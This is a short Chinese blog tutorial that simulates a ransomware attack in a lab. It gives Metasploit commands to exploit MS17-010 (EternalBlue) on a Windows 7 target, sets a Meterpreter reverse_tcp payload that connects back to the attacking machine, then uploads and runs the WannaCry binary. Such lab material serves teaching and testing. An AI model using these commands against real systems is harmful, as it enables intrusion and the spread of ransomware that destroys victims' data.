勒索病毒場景模擬及原理
阿新 • • 發佈:2019-03-29
慎用 進行 -c 傳輸 應用 win fff inf 攻擊
一、環境準備
需準備如下環境及工具:
1) 一臺攻擊虛機(Kali linux),一臺靶機(Win7 64位)
3) 永恒之藍(wannacry)病毒文件
二、環境準備
1.在kali linux下啟動msfconsole
通過該應用,可以訪問和使用所有的metasploit的插件,payload,利用模塊,post模塊等。
root@kali:~#msfconsole
2.利用永恒之藍MS17-010漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue
3. 設定靶機 IP 和操作機 IP
172.22.170.4為操作機kali-linux ip地址
172.22.171.4為靶機windows 7 ip地址
msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 172.22.171.4 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 172.22.170.4
4.設置TCP連接
使用meterpreter編寫的TCP反彈連接木馬,用於在滲透成功後向攻擊機發起連接請求進一步控制靶機的模塊。
set payload windows/x64/meterpreter/reverse_tcp
5.進行滲透
界面如下顯示,則表示滲透成功
6.向目標主機傳輸病毒文件(慎用,僅用於實驗測試)
成功傳輸
6.在目標主機上執行該病毒文件
execute -f C:\\Wannacry.exe
7.目標主機被攻陷
勒索病毒場景模擬及原理